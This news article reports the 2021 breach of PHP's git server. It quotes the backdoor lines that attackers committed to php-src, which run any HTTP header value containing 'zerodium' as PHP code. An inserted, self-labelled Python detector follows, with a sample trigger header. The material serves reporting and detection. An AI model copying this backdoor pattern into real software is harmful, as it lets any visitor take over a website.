Hackers backdoor PHP source code after breaching internal git server

29/03/2021

A cartoon door leads to a wall of computer code.

A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The two malicious commits gave code-injection capability to any visitor who had the word “zerodium” in an HTTP header.

PHP.net hacked, code backdoored

The commits were made to the php-src repo under the account names of two well-known PHP developers, Rasmus Lerdorf and Nikita Popov. “We don’t yet know how exactly this happened, but everything points toward a compromise of the git.php.net server (rather than a compromise of an individual git account),” Popov wrote in a notice published on Sunday night.

In the aftermath of the compromise, Popov said that PHP maintainers have concluded that their standalone Git infrastructure is an unnecessary security risk. As a result, they will discontinue the git.php.net server and make GitHub the official source for PHP repositories. Going forward, all PHP source code changes will be made directly to GitHub rather than to git.php.net.

The malicious changes were brought to public attention no later than Sunday night by developers including Markus Staab, Jake Birchall, and Michael Voříšek as they scrutinized a commit made on Saturday. The update, which purported to fix a typo, was made under an account that used Lerdorf’s name. Shortly after the first discovery, Voříšek spotted the second malicious commit, which was made under Popov’s account name. It purported to revert the previous typo fix.


Both commits added the same lines of code:

	convert_to_string(enc);
	if (strstr(Z_STRVAL_P(enc), "zerodium")) {   /* fires if the trigger string appears anywhere in the header value */
		zend_try {
			/* evaluates the header value, minus its first 8 bytes, as PHP code */
			zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
		} zend_end_try();
	}
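As an added example (not code from the article or from php-src), the trigger check above mirrored in Python and run over a constructed HTTP request, so a defender reviewing request logs can see which header values would have reached eval on a backdoored build. The names SAMPLE_REQUEST, evaluated_payload and scan_request are mine; because the article does not name the header, every header is checked.

```python
"""Detect requests that would have fired the php-src backdoor quoted above.

The injected C called strstr(value, "zerodium") and then evaluated
value + 8 as PHP: the evaluated text is everything after the first 8
bytes of the header value, not everything after the match.
"""
from typing import List, Optional, Tuple

MARKER = "zerodium"   # trigger string used by the malicious commits
SKIP = 8              # hard-coded offset from the commit (len("zerodium"))


def evaluated_payload(header_value: str) -> Optional[str]:
    """Return the text the backdoor would have handed to zend_eval_string,
    or None when this header value would not have triggered it."""
    if MARKER not in header_value:   # strstr(): case-sensitive, anywhere
        return None
    return header_value[SKIP:]       # Z_STRVAL_P(enc)+8: fixed offset


def scan_request(raw_request: str) -> List[Tuple[str, str]]:
    """Parse a raw HTTP request head and return (header name, payload)
    for every header that would have fired the backdoor."""
    hits = []
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:      # skip the request line
        name, sep, value = line.partition(":")
        if not sep:
            continue
        payload = evaluated_payload(value.strip())
        if payload is not None:
            hits.append((name.strip(), payload))
    return hits


# Constructed sample request (not a real capture). The X-Note header shows
# the fixed-offset quirk: the marker matches, but the first 8 bytes of the
# value are dropped regardless of where the marker sits.
SAMPLE_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "X-Probe: zerodiumecho 'probe';\r\n"
    "X-Note: contains zerodium later\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, payload in scan_request(SAMPLE_REQUEST):
        print(f"{name}: would evaluate {payload!r}")
```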

Zerodium is a broker that buys exploits from researchers and sells them to government agencies for use in investigations or other purposes. Why the commits referenced Zerodium is not clear. The company’s CEO, Chaouki Bekrar, said on Twitter Monday that Zerodium wasn’t involved.

“Cheers to the troll who put ‘Zerodium’ in today’s PHP git compromised commits,” he wrote. “Obviously, we have nothing to do with this. Likely, the researcher(s) who found this bug/exploit tried to sell it to many entities but none wanted to buy this crap, so they burned it for fun.”


Bad karma

Prior to the compromise, The PHP Group handled all write access to the repository on their own git server http://git.php.net/ using what Popov called a “home-grown” system called Karma. It provided developers different levels of access privileges depending on previous contributions. GitHub, meanwhile, had been a mirror repository.

Now, the PHP Group is abandoning the self-hosted and managed git infrastructure and replacing it with GitHub. The change means that GitHub is now the “canonical” repository. The PHP Group will no longer use the Karma system. Instead, contributors will have to be part of the PHP organization on GitHub and must use two-factor authentication for accounts with the ability to make commits.

This weekend’s event isn’t the first time php.net servers have been breached with the intent of performing a supply chain attack. In early 2019, the widely used PHP Extension and Application Repository temporarily shut down most of the site after discovering that hackers replaced the main package manager with a malicious one. Group developers said that anyone who had downloaded the package manager in the past six months should get a new copy.

PHP runs an estimated 80 percent of websites. There are no reports of websites incorporating the malicious changes into their production environments.

The changes were likely made by people who wanted to brag about their unauthorized access to the PHP Git server rather than by people trying to actually backdoor websites that use PHP, said HD Moore, co-founder and CEO of network discovery platform Rumble.

“Sounds like the attackers are trolling Zerodium or trying to give the impression that the code was backdoored for much longer,” he told Ars. “Either way, I would be spending a lot of time going through previous commits if I had any security interest in PHP.”
